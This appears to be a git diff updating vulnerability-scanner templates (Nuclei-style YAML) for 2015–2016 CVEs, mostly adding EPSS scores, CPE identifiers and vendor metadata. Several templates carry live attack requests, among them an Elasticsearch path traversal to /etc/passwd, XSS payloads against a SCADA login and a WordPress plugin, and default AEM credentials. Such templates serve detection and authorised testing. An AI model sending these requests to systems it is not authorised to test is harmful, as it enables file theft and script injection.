http://packetstormsecurity.com/files/133797/ElasticSearch-Path-Traversal-Arbitrary-File-Download.html classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N cvss-score: 5 cve-id: CVE-2015-5531 cwe-id: CWE-22 - tags: vulhub,packetstorm,cve,cve2015,elasticsearch + epss-score: 0.97074 + cpe: cpe:2.3:a:elasticsearch:elasticsearch:*:*:*:*:*:*:*:* metadata: max-request: 3 + vendor: elasticsearch + product: elasticsearch + tags: vulhub,packetstorm,cve,cve2015,elasticsearch,intrusive http: - raw: @@ -31,7 +36,6 @@ http: "location": "/usr/share/elasticsearch/repo/test" } } - - | PUT /_snapshot/test2 HTTP/1.1 Host: {{Hostname}} @@ -42,7 +46,6 @@ http: "location": "/usr/share/elasticsearch/repo/test/snapshot-backdata" } } - - | GET /_snapshot/test/backdata%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd HTTP/1.1 Host: {{Hostname}} @@ -52,9 +55,9 @@ http: - type: word part: body words: - - 'ElasticsearchParseException' - - 'Failed to derive xcontent from' - - '114, 111, 111, 116, 58' + - ElasticsearchParseException + - Failed to derive xcontent from + - 114, 111, 111, 116, 58 condition: and - type: status diff --git a/http/cves/2015/CVE-2015-5688.yaml b/http/cves/2015/CVE-2015-5688.yaml index e30a742823..bf5ca44f41 100644 --- a/http/cves/2015/CVE-2015-5688.yaml +++ b/http/cves/2015/CVE-2015-5688.yaml @@ -3,21 +3,27 @@ id: CVE-2015-5688 info: name: Geddy <13.0.8 - Local File Inclusion author: pikpikcu - severity: high + severity: medium description: Geddy prior to version 13.0.8 contains a directory traversal vulnerability in lib/app/index.js that allows remote attackers to read arbitrary files via a ..%2f (dot dot encoded slash) in the PATH_INFO to the default URI. reference: - https://nodesecurity.io/advisories/geddy-directory-traversal - https://github.com/geddy/geddy/issues/697 - https://github.com/geddy/geddy/commit/2de63b68b3aa6c08848f261ace550a37959ef231 - https://nvd.nist.gov/vuln/detail/CVE-2015-5688 + - https://github.com/geddy/geddy/pull/699 classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N cvss-score: 5 cve-id: CVE-2015-5688 cwe-id: CWE-22 - tags: cve,cve2015,geddy,lfi + epss-score: 0.01347 + cpe: cpe:2.3:a:geddyjs:geddy:13.0.7:*:*:*:*:node.js:*:* metadata: max-request: 1 + framework: node.js + vendor: geddyjs + product: geddy + tags: cve,cve2015,geddy,lfi http: - method: GET @@ -27,9 +33,9 @@ http: matchers-condition: and matchers: - type: regex + part: body regex: - "root:.*:0:0:" - part: body - type: status status: diff --git a/http/cves/2015/CVE-2015-6477.yaml b/http/cves/2015/CVE-2015-6477.yaml index d2e7562f3a..065d615e02 100644 --- a/http/cves/2015/CVE-2015-6477.yaml +++ b/http/cves/2015/CVE-2015-6477.yaml @@ -9,19 +9,26 @@ info: - https://seclists.org/fulldisclosure/2015/Dec/117 - https://ics-cert.us-cert.gov/advisories/ICSA-15-286-01 - https://nvd.nist.gov/vuln/detail/CVE-2015-6477 + - http://packetstormsecurity.com/files/135068/Nordex-Control-2-NC2-SCADA-16-Cross-Site-Scripting.html + - http://seclists.org/fulldisclosure/2015/Dec/117 classification: cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:N/I:P/A:N cvss-score: 4.3 cve-id: CVE-2015-6477 cwe-id: CWE-79 - tags: xss,iot,nordex,nc2,seclists,cve,cve2015 + epss-score: 0.00357 + cpe: cpe:2.3:o:nordex:nordex_control_2_scada:*:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: nordex + product: nordex_control_2_scada + tags: seclists,packetstorm,xss,iot,nordex,nc2,cve,cve2015 http: - method: POST path: - "{{BaseURL}}/login" + body: 'connection=basic&userName=admin%27%22%29%3B%7D%3C%2Fscript%3E%3Cscript%3Ealert%28%27{{randstr}}%27%29%3C%2Fscript%3E&pw=nordex&language=en' matchers-condition: and diff --git a/http/cves/2015/CVE-2015-6544.yaml b/http/cves/2015/CVE-2015-6544.yaml index ae22fdf5e5..1261c787aa 100644 --- a/http/cves/2015/CVE-2015-6544.yaml +++ b/http/cves/2015/CVE-2015-6544.yaml @@ -16,9 +16,13 @@ info: cvss-score: 6.1 cve-id: CVE-2015-6544 cwe-id: CWE-79 - tags: cve,cve2015,xss,itop + epss-score: 0.00284 + cpe: cpe:2.3:a:combodo:itop:*:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: combodo + product: itop + tags: cve,cve2015,xss,itop http: - method: GET @@ -28,15 +32,15 @@ http: matchers-condition: and matchers: - type: word + part: body words: - '' - part: body - - - type: status - status: - - 200 - type: word part: header words: - text/html + + - type: status + status: + - 200 diff --git a/http/cves/2015/CVE-2015-6920.yaml b/http/cves/2015/CVE-2015-6920.yaml index da58178b3c..a2692810fd 100644 --- a/http/cves/2015/CVE-2015-6920.yaml +++ b/http/cves/2015/CVE-2015-6920.yaml @@ -11,12 +11,17 @@ info: - https://nvd.nist.gov/vuln/detail/CVE-2015-6920 classification: cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:N/I:P/A:N + cvss-score: 4.3 cve-id: CVE-2015-6920 cwe-id: CWE-79 - cvss-score: 4.3 - tags: wp-plugin,xss,packetstorm,cve,cve2015,wordpress + epss-score: 0.0016 + cpe: cpe:2.3:a:sourceafrica_project:sourceafrica:0.1.3:*:*:*:*:wordpress:*:* metadata: max-request: 1 + framework: wordpress + vendor: sourceafrica_project + product: sourceafrica + tags: wp-plugin,xss,packetstorm,cve,cve2015,wordpress http: - method: GET @@ -26,9 +31,9 @@ http: matchers-condition: and matchers: - type: word + part: body words: - '">' - part: body - type: word part: header diff --git a/http/cves/2015/CVE-2015-7245.yaml b/http/cves/2015/CVE-2015-7245.yaml index 278f264a7a..dadc000d42 100644 --- a/http/cves/2015/CVE-2015-7245.yaml +++ b/http/cves/2015/CVE-2015-7245.yaml @@ -15,9 +15,13 @@ info: cvss-score: 7.5 cve-id: CVE-2015-7245 cwe-id: CWE-22 - tags: cve,cve2015,dlink,lfi,packetstorm,edb + epss-score: 0.96881 + cpe: cpe:2.3:o:d-link:dvg-n5402sp_firmware:w1000cn-00:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: d-link + product: dvg-n5402sp_firmware + tags: cve,cve2015,dlink,lfi,packetstorm,edb http: - raw: diff --git a/http/cves/2015/CVE-2015-7297.yaml b/http/cves/2015/CVE-2015-7297.yaml index 9bd22d4801..74a7eda1cf 100644 --- a/http/cves/2015/CVE-2015-7297.yaml +++ b/http/cves/2015/CVE-2015-7297.yaml @@ -9,15 +9,20 @@ info: - https://nvd.nist.gov/vuln/detail/CVE-2015-7297 - http://developer.joomla.org/security-centre/628-20151001-core-sql-injection.html - https://www.trustwave.com/Resources/SpiderLabs-Blog/Joomla-SQL-Injection-Vulnerability-Exploit-Results-in-Full-Administrative-Access/ + - http://packetstormsecurity.com/files/134097/Joomla-3.44-SQL-Injection.html + - http://packetstormsecurity.com/files/134494/Joomla-Content-History-SQL-Injection-Remote-Code-Execution.html classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P cvss-score: 7.5 cve-id: CVE-2015-7297 cwe-id: CWE-89 - tags: cve,cve2015,joomla,sqli + epss-score: 0.97564 + cpe: cpe:2.3:a:joomla:joomla\!:3.2.0:*:*:*:*:*:*:* metadata: max-request: 1 - + vendor: joomla + product: joomla\! + tags: packetstorm,cve,cve2015,joomla,sqli variables: num: "999999999" @@ -28,6 +33,6 @@ http: matchers: - type: word + part: body words: - '{{md5({{num}})}}' - part: body diff --git a/http/cves/2015/CVE-2015-7377.yaml b/http/cves/2015/CVE-2015-7377.yaml index 4d839acc00..38ba59a2fc 100644 --- a/http/cves/2015/CVE-2015-7377.yaml +++ b/http/cves/2015/CVE-2015-7377.yaml @@ -10,14 +10,20 @@ info: - https://github.com/GTSolutions/Pie-Register/blob/2.0.19/readme.txt - https://nvd.nist.gov/vuln/detail/CVE-2015-7377 - http://packetstormsecurity.com/files/133928/WordPress-Pie-Register-2.0.18-Cross-Site-Scripting.html + - https://wpvulndb.com/vulnerabilities/8212 classification: cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:N/I:P/A:N cvss-score: 4.3 cve-id: CVE-2015-7377 cwe-id: CWE-79 - tags: cve2015,wordpress,wp-plugin,xss,packetstorm,cve + epss-score: 0.00239 + cpe: cpe:2.3:a:genetechsolutions:pie_register:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 + framework: wordpress + vendor: genetechsolutions + product: pie_register + tags: cve2015,wordpress,wp-plugin,xss,packetstorm,cve http: - method: GET @@ -27,9 +33,9 @@ http: matchers-condition: and matchers: - type: word + part: body words: - "" - part: body - type: word part: header diff --git a/http/cves/2015/CVE-2015-7450.yaml b/http/cves/2015/CVE-2015-7450.yaml index 1da31ff342..e0915a593a 100644 --- a/http/cves/2015/CVE-2015-7450.yaml +++ b/http/cves/2015/CVE-2015-7450.yaml @@ -10,14 +10,19 @@ info: - https://foxglovesecurity.com/2015/11/06/what-do-weblogic-websphere-jboss-jenkins-opennms-and-your-application-have-in-common-this-vulnerability/ - https://nvd.nist.gov/vuln/detail/CVE-2015-7450 - http://www-01.ibm.com/support/docview.wss?uid=swg21972799 + - http://www-01.ibm.com/support/docview.wss?uid=swg21970575 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2015-7450 cwe-id: CWE-94 + epss-score: 0.97411 + cpe: cpe:2.3:a:ibm:tivoli_common_reporting:2.1:*:*:*:*:*:*:* metadata: max-request: 1 shodan-query: http.html:"IBM WebSphere Portal" + vendor: ibm + product: tivoli_common_reporting tags: cve,cve2015,websphere,deserialization,rce,oast,ibm,java,kev http: @@ -44,10 +49,6 @@ http: matchers-condition: and matchers: - - type: status - status: - - 500 - - type: word words: - 'SOAP-ENV:Server' @@ -55,6 +56,10 @@ http: condition: and - type: word - part: interactsh_protocol # Confirms the DNS Interaction + part: interactsh_protocol # Confirms the DNS Interaction words: - "dns" + + - type: status + status: + - 500 diff --git a/http/cves/2015/CVE-2015-7780.yaml b/http/cves/2015/CVE-2015-7780.yaml index 222859c369..adb50e8858 100644 --- a/http/cves/2015/CVE-2015-7780.yaml +++ b/http/cves/2015/CVE-2015-7780.yaml @@ -15,9 +15,13 @@ info: cvss-score: 6.5 cve-id: CVE-2015-7780 cwe-id: CWE-22 - tags: manageengine,edb,cve,cve2015,lfi + epss-score: 0.00151 + cpe: cpe:2.3:a:zohocorp:manageengine_firewall_analyzer:*:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: zohocorp + product: manageengine_firewall_analyzer + tags: manageengine,edb,cve,cve2015,lfi http: - method: GET @@ -26,18 +30,18 @@ http: matchers-condition: and matchers: - - type: status - status: - - 200 - - type: word + part: body words: - "" - "java.sun.com" - part: body condition: and - type: word part: header words: - "application/xml" + + - type: status + status: + - 200 diff --git a/http/cves/2015/CVE-2015-7823.yaml b/http/cves/2015/CVE-2015-7823.yaml index 6f929c78f4..6ebbc77776 100644 --- a/http/cves/2015/CVE-2015-7823.yaml +++ b/http/cves/2015/CVE-2015-7823.yaml @@ -3,7 +3,7 @@ id: CVE-2015-7823 info: name: Kentico CMS 8.2 - Open Redirect author: 0x_Akoko - severity: low + severity: medium description: Kentico CMS 8.2 contains an open redirect vulnerability via GetDocLink.ashx with link variable. An attacker can construct a URL within the application that causes a redirection to an arbitrary external domain. reference: - https://packetstormsecurity.com/files/133981/Kentico-CMS-8.2-Cross-Site-Scripting-Open-Redirect.html @@ -11,12 +11,16 @@ info: - http://packetstormsecurity.com/files/133981/Kentico-CMS-8.2-Cross-Site-Scripting-Open-Redirect.html classification: cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:P/I:P/A:N + cvss-score: 5.8 cve-id: CVE-2015-7823 cwe-id: NVD-CWE-Other - cvss-score: 5.8 - tags: cve,cve2015,kentico,redirect,packetstorm + epss-score: 0.00233 + cpe: cpe:2.3:a:kentico:kentico_cms:8.2:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: kentico + product: kentico_cms + tags: cve,cve2015,kentico,redirect,packetstorm http: - method: GET @@ -25,6 +29,6 @@ http: matchers: - type: regex + part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$' - part: header diff --git a/http/cves/2015/CVE-2015-8349.yaml b/http/cves/2015/CVE-2015-8349.yaml index 258594b64c..c09e5962d7 100644 --- a/http/cves/2015/CVE-2015-8349.yaml +++ b/http/cves/2015/CVE-2015-8349.yaml @@ -7,16 +7,19 @@ info: description: SourceBans before 2.0 contains a cross-site scripting vulnerability which allows remote attackers to inject arbitrary web script or HTML via the advSearch parameter to index.php. reference: - https://www.htbridge.com/advisory/HTB23273 - - http://web.archive.org/web/20201207072921/https://www.securityfocus.com/archive/1/537018/100/0/threaded - https://nvd.nist.gov/vuln/detail/CVE-2015-8349 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2015-8349 cwe-id: CWE-79 - tags: cve,cve2015,xss,sourcebans + epss-score: 0.00127 + cpe: cpe:2.3:a:gameconnect:sourcebans:*:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: gameconnect + product: sourcebans + tags: cve,cve2015,xss,sourcebans http: - method: GET @@ -26,15 +29,15 @@ http: matchers-condition: and matchers: - type: word + part: body words: - '' - part: body - - - type: status - status: - - 200 - type: word part: header words: - text/ + + - type: status + status: + - 200 diff --git a/http/cves/2015/CVE-2015-8399.yaml b/http/cves/2015/CVE-2015-8399.yaml index c0567939c9..b85cb15a2f 100644 --- a/http/cves/2015/CVE-2015-8399.yaml +++ b/http/cves/2015/CVE-2015-8399.yaml @@ -8,16 +8,19 @@ info: reference: - https://jira.atlassian.com/browse/CONFSERVER-39704?src=confmacro - https://www.exploit-db.com/exploits/39170/ - - http://web.archive.org/web/20201209041130/https://www.securityfocus.com/archive/1/537232/100/0/threaded - https://nvd.nist.gov/vuln/detail/CVE-2015-8399 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N cvss-score: 4.3 cve-id: CVE-2015-8399 cwe-id: CWE-200 + epss-score: 0.9647 + cpe: cpe:2.3:a:atlassian:confluence:*:*:*:*:*:*:*:* metadata: max-request: 1 shodan-query: http.component:"Atlassian Confluence" + vendor: atlassian + product: confluence tags: edb,cve,cve2015,atlassian,confluence http: @@ -27,13 +30,13 @@ http: matchers-condition: and matchers: - - type: status - status: - - 200 - - type: word part: body words: - "confluence-init.properties" - "View Default Decorator" condition: and + + - type: status + status: + - 200 diff --git a/http/cves/2015/CVE-2015-8813.yaml b/http/cves/2015/CVE-2015-8813.yaml index 01fd5cdc21..482af0b3c6 100644 --- a/http/cves/2015/CVE-2015-8813.yaml +++ b/http/cves/2015/CVE-2015-8813.yaml @@ -10,14 +10,19 @@ info: - https://nvd.nist.gov/vuln/detail/CVE-2015-8813 - https://github.com/umbraco/Umbraco-CMS/commit/924a016ffe7ae7ea6d516c07a7852f0095eddbce - http://www.openwall.com/lists/oss-security/2016/02/18/8 + - http://issues.umbraco.org/issue/U4-7457 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:H/A:N cvss-score: 8.2 cve-id: CVE-2015-8813 cwe-id: CWE-918 - tags: cve,cve2015,ssrf,oast,umbraco + epss-score: 0.00511 + cpe: cpe:2.3:a:umbraco:umbraco:*:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: umbraco + product: umbraco + tags: cve,cve2015,ssrf,oast,umbraco http: - method: GET @@ -26,6 +31,6 @@ http: matchers: - type: word - part: interactsh_protocol # Confirms the HTTP Interaction + part: interactsh_protocol # Confirms the HTTP Interaction words: - "http" diff --git a/http/cves/2015/CVE-2015-9312.yaml b/http/cves/2015/CVE-2015-9312.yaml index e2ce486f4f..41008b0b18 100644 --- a/http/cves/2015/CVE-2015-9312.yaml +++ b/http/cves/2015/CVE-2015-9312.yaml @@ -17,9 +17,14 @@ info: cvss-score: 6.1 cve-id: CVE-2015-9312 cwe-id: CWE-79 + epss-score: 0.00088 + cpe: cpe:2.3:a:newstatpress_project:newstatpress:*:*:*:*:*:wordpress:*:* metadata: max-request: 2 verified: true + framework: wordpress + vendor: newstatpress_project + product: newstatpress tags: cve2015,xss,authenticated,wp,newstatpress,wpscan,cve,wordpress,wp-plugin http: @@ -30,7 +35,6 @@ http: Content-Type: application/x-www-form-urlencoded log={{username}}&pwd={{password}}&wp-submit=Log+In - - | GET /wp-admin/admin.php?groupby1=checked%3E%3Cimg+src%3Dx+onerror%3Dalert%28document.domain%29&page=nsp_search&newstatpress_action=search HTTP/1.1 Host: {{Hostname}} diff --git a/http/cves/2015/CVE-2015-9414.yaml b/http/cves/2015/CVE-2015-9414.yaml index 63958d0234..ee33cc0eea 100644 --- a/http/cves/2015/CVE-2015-9414.yaml +++ b/http/cves/2015/CVE-2015-9414.yaml @@ -15,11 +15,14 @@ info: cvss-score: 6.1 cve-id: CVE-2015-9414 cwe-id: CWE-79 - cpe: cpe:2.3:a:wpsymposiumpro:wp-symposium:*:*:*:*:*:*:*:* epss-score: 0.00111 + cpe: cpe:2.3:a:wpsymposiumpro:wp-symposium:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 google-query: inurl:"/wp-content/plugins/wp-symposium" + framework: wordpress + vendor: wpsymposiumpro + product: wp-symposium tags: xss,wpscan,cve,cve2015,wordpress,wp-plugin http: @@ -30,9 +33,9 @@ http: matchers-condition: and matchers: - type: word + part: body words: - '' - part: body - type: word part: header diff --git a/http/cves/2015/CVE-2015-9480.yaml b/http/cves/2015/CVE-2015-9480.yaml index 26e2c6602a..08a5002865 100644 --- a/http/cves/2015/CVE-2015-9480.yaml +++ b/http/cves/2015/CVE-2015-9480.yaml @@ -13,11 +13,14 @@ info: cvss-score: 7.5 cve-id: CVE-2015-9480 cwe-id: CWE-22 - cpe: cpe:2.3:a:robot-cpa:robotcpa:*:*:*:*:*:*:*:* - epss-score: 0.14215 + epss-score: 0.23765 + cpe: cpe:2.3:a:robot-cpa:robotcpa:5:*:*:*:*:wordpress:*:* metadata: max-request: 1 google-query: inurl:"/wp-content/plugins/robotcpa" + framework: wordpress + vendor: robot-cpa + product: robotcpa tags: wp-plugin,lfi,edb,cve,cve2015,wordpress http: @@ -28,9 +31,10 @@ http: matchers-condition: and matchers: - type: regex + part: body regex: - "root:.*:0:0:" - part: body + - type: status status: - 200 diff --git a/http/cves/2016/CVE-2016-0957.yaml b/http/cves/2016/CVE-2016-0957.yaml index 0aab723032..79066d1546 100644 --- a/http/cves/2016/CVE-2016-0957.yaml +++ b/http/cves/2016/CVE-2016-0957.yaml @@ -13,26 +13,32 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2016-0957 + epss-score: 0.06304 + cpe: cpe:2.3:a:adobe:dispatcher:*:*:*:*:*:*:*:* metadata: max-request: 1 shodan-query: http.component:"Adobe Experience Manager" + vendor: adobe + product: dispatcher tags: cve,cve2016,adobe,aem http: - method: GET path: - "{{BaseURL}}/system/console?.css" + headers: Authorization: "Basic YWRtaW46YWRtaW4K" matchers-condition: and matchers: - - type: status - status: - - 200 - type: word words: - "Adobe" - "java.lang" - "(Runtime)" condition: and + + - type: status + status: + - 200 diff --git a/http/cves/2016/CVE-2016-1000126.yaml b/http/cves/2016/CVE-2016-1000126.yaml index 66f11268cc..9c24a4852d 100644 --- a/http/cves/2016/CVE-2016-1000126.yaml +++ b/http/cves/2016/CVE-2016-1000126.yaml @@ -8,16 +8,20 @@ info: reference: - http://www.vapidlabs.com/wp/wp_advisory.php?v=526 - https://wordpress.org/plugins/admin-font-editor - - http://web.archive.org/web/20210123183728/https://www.securityfocus.com/bid/93896/ - https://nvd.nist.gov/vuln/detail/CVE-2016-1000126 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2016-1000126 cwe-id: CWE-79 + epss-score: 0.00119 + cpe: cpe:2.3:a:admin-font-editor_project:admin-font-editor:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 google-query: inurl:"/wp-content/plugins/admin-font-editor" + framework: wordpress + vendor: admin-font-editor_project + product: admin-font-editor tags: cve,cve2016,wordpress,xss,wp-plugin http: @@ -28,9 +32,9 @@ http: matchers-condition: and matchers: - type: word + part: body words: - "" - part: body - type: word part: header diff --git a/http/cves/2016/CVE-2016-1000127.yaml b/http/cves/2016/CVE-2016-1000127.yaml index 9b80d2946f..44fbc48f3f 100644 --- a/http/cves/2016/CVE-2016-1000127.yaml +++ b/http/cves/2016/CVE-2016-1000127.yaml @@ -8,16 +8,20 @@ info: reference: - http://www.vapidlabs.com/wp/wp_advisory.php?v=494 - https://wordpress.org/plugins/ajax-random-post - - http://web.archive.org/web/20210614214105/https://www.securityfocus.com/bid/93895 - https://nvd.nist.gov/vuln/detail/CVE-2016-1000127 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2016-1000127 cwe-id: CWE-79 - tags: cve,cve2016,wordpress,xss,wp-plugin + epss-score: 0.00119 + cpe: cpe:2.3:a:ajax-random-post_project:ajax-random-post:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 + framework: wordpress + vendor: ajax-random-post_project + product: ajax-random-post + tags: cve,cve2016,wordpress,xss,wp-plugin http: - method: GET @@ -27,9 +31,9 @@ http: matchers-condition: and matchers: - type: word + part: body words: - "" - part: body - type: word part: header diff --git a/http/cves/2016/CVE-2016-1000128.yaml b/http/cves/2016/CVE-2016-1000128.yaml index b6131780cf..474d5fe824 100644 --- a/http/cves/2016/CVE-2016-1000128.yaml +++ b/http/cves/2016/CVE-2016-1000128.yaml @@ -14,9 +14,14 @@ info: cvss-score: 6.1 cve-id: CVE-2016-1000128 cwe-id: CWE-79 + epss-score: 0.001 + cpe: cpe:2.3:a:anti-plagiarism_project:anti-plagiarism:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 google-query: inurl:"/wp-content/plugins/anti-plagiarism" + framework: wordpress + vendor: anti-plagiarism_project + product: anti-plagiarism tags: cve,cve2016,wordpress,xss,wp-plugin http: @@ -27,9 +32,9 @@ http: matchers-condition: and matchers: - type: word + part: body words: - "" - part: body - type: word part: header diff --git a/http/cves/2016/CVE-2016-1000129.yaml b/http/cves/2016/CVE-2016-1000129.yaml index 134b362cb5..65dab23dea 100644 --- a/http/cves/2016/CVE-2016-1000129.yaml +++ b/http/cves/2016/CVE-2016-1000129.yaml @@ -8,16 +8,20 @@ info: reference: - https://wordpress.org/plugins/defa-online-image-protector - http://www.vapidlabs.com/wp/wp_advisory.php?v=449 - - http://web.archive.org/web/20210614204644/https://www.securityfocus.com/bid/93892 - https://nvd.nist.gov/vuln/detail/CVE-2016-1000129 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2016-1000129 cwe-id: CWE-79 + epss-score: 0.00119 + cpe: cpe:2.3:a:defa-online-image-protector_project:defa-online-image-protector:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 google-query: inurl:"/wp-content/plugins/defa-online-image-protector" + framework: wordpress + vendor: defa-online-image-protector_project + product: defa-online-image-protector tags: cve,cve2016,wordpress,xss,wp-plugin http: @@ -28,9 +32,9 @@ http: matchers-condition: and matchers: - type: word + part: body words: - "" - part: body - type: word part: header diff --git a/http/cves/2016/CVE-2016-1000130.yaml b/http/cves/2016/CVE-2016-1000130.yaml index f46050c8d1..461dee8a7a 100644 --- a/http/cves/2016/CVE-2016-1000130.yaml +++ b/http/cves/2016/CVE-2016-1000130.yaml @@ -14,9 +14,14 @@ info: cvss-score: 6.1 cve-id: CVE-2016-1000130 cwe-id: CWE-79 + epss-score: 0.00093 + cpe: cpe:2.3:a:e-search_project:e-search:1.0:*:*:*:*:wordpress:*:* metadata: max-request: 1 google-query: inurl:"/wp-content/plugins/e-search" + framework: wordpress + vendor: e-search_project + product: e-search tags: cve,cve2016,wordpress,xss,wp-plugin http: @@ -27,9 +32,9 @@ http: matchers-condition: and matchers: - type: word + part: body words: - "" - part: body - type: word part: header diff --git a/http/cves/2016/CVE-2016-1000131.yaml b/http/cves/2016/CVE-2016-1000131.yaml index 59d07e99cb..1b80c03b1a 100644 --- a/http/cves/2016/CVE-2016-1000131.yaml +++ b/http/cves/2016/CVE-2016-1000131.yaml @@ -8,16 +8,20 @@ info: reference: - http://www.vapidlabs.com/wp/wp_advisory.php?v=393 - https://wordpress.org/plugins/e-search - - http://web.archive.org/web/20210123183536/https://www.securityfocus.com/bid/93867/ - https://nvd.nist.gov/vuln/detail/CVE-2016-1000131 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2016-1000131 cwe-id: CWE-79 + epss-score: 0.001 + cpe: cpe:2.3:a:e-search_project:esearch:1.0:*:*:*:*:wordpress:*:* metadata: max-request: 1 google-query: inurl:"/wp-content/plugins/e-search" + framework: wordpress + vendor: e-search_project + product: esearch tags: cve,cve2016,wordpress,xss,wp-plugin http: @@ -28,9 +32,9 @@ http: matchers-condition: and matchers: - type: word + part: body words: - "" - part: body - type: word part: header diff --git a/http/cves/2016/CVE-2016-1000132.yaml b/http/cves/2016/CVE-2016-1000132.yaml index 6e4067633f..6c01ed11c2 100644 --- a/http/cves/2016/CVE-2016-1000132.yaml +++ b/http/cves/2016/CVE-2016-1000132.yaml @@ -8,16 +8,20 @@ info: reference: - http://www.vapidlabs.com/wp/wp_advisory.php?v=37 - https://wordpress.org/plugins/enhanced-tooltipglossary - - http://web.archive.org/web/20210123183532/https://www.securityfocus.com/bid/93865/ - https://nvd.nist.gov/vuln/detail/CVE-2016-1000132 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2016-1000132 cwe-id: CWE-79 + epss-score: 0.00116 + cpe: cpe:2.3:a:cminds:tooltip_glossary:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 google-query: inurl:"/wp-content/plugins/enhanced-tooltipglossary" + framework: wordpress + vendor: cminds + product: tooltip_glossary tags: cve,cve2016,wordpress,xss,wp-plugin http: @@ -28,9 +32,9 @@ http: matchers-condition: and matchers: - type: word + part: body words: - "" - part: body - type: word part: header diff --git a/http/cves/2016/CVE-2016-1000133.yaml b/http/cves/2016/CVE-2016-1000133.yaml index 38926e240e..2839c0fccf 100644 --- a/http/cves/2016/CVE-2016-1000133.yaml +++ b/http/cves/2016/CVE-2016-1000133.yaml @@ -8,16 +8,20 @@ info: reference: - https://wordpress.org/plugins/forget-about-shortcode-buttons - http://www.vapidlabs.com/wp/wp_advisory.php?v=602 - - http://web.archive.org/web/20210123183542/https://www.securityfocus.com/bid/93869/ - https://nvd.nist.gov/vuln/detail/CVE-2016-1000133 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2016-1000133 cwe-id: CWE-79 + epss-score: 0.00142 + cpe: cpe:2.3:a:designsandcode:forget_about_shortcode_buttons:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 google-query: inurl:"/wp-content/plugins/forget-about-shortcode-buttons" + framework: wordpress + vendor: designsandcode + product: forget_about_shortcode_buttons tags: cve,cve2016,wordpress,xss,wp-plugin http: @@ -28,9 +32,9 @@ http: matchers-condition: and matchers: - type: word + part: body words: - "" - part: body - type: word part: header diff --git a/http/cves/2016/CVE-2016-1000134.yaml b/http/cves/2016/CVE-2016-1000134.yaml index 2ab63fcf20..023b296800 100644 --- a/http/cves/2016/CVE-2016-1000134.yaml +++ b/http/cves/2016/CVE-2016-1000134.yaml @@ -8,16 +8,20 @@ info: reference: - http://www.vapidlabs.com/wp/wp_advisory.php?v=530 - https://wordpress.org/plugins/hdw-tube - - http://web.archive.org/web/20210615135341/https://www.securityfocus.com/bid/93868 - https://nvd.nist.gov/vuln/detail/CVE-2016-1000134 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2016-1000134 cwe-id: CWE-79 + epss-score: 0.001 + cpe: cpe:2.3:a:hdw-tube_project:hdw-tube:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 google-query: inurl:"/wp-content/plugins/hdw-tube" + framework: wordpress + vendor: hdw-tube_project + product: hdw-tube tags: cve,cve2016,wordpress,xss,wp-plugin http: @@ -28,9 +32,9 @@ http: matchers-condition: and matchers: - type: word + part: body words: - "" - part: body - type: word part: header diff --git a/http/cves/2016/CVE-2016-1000135.yaml b/http/cves/2016/CVE-2016-1000135.yaml index 7977a0cd7e..7bf2dc6517 100644 --- a/http/cves/2016/CVE-2016-1000135.yaml +++ b/http/cves/2016/CVE-2016-1000135.yaml @@ -8,16 +8,20 @@ info: reference: - http://www.vapidlabs.com/wp/wp_advisory.php?v=533 - https://wordpress.org/plugins/hdw-tube - - http://web.archive.org/web/20210123183240/https://www.securityfocus.com/bid/93820/ - https://nvd.nist.gov/vuln/detail/CVE-2016-1000135 classification: cvss-metrics: 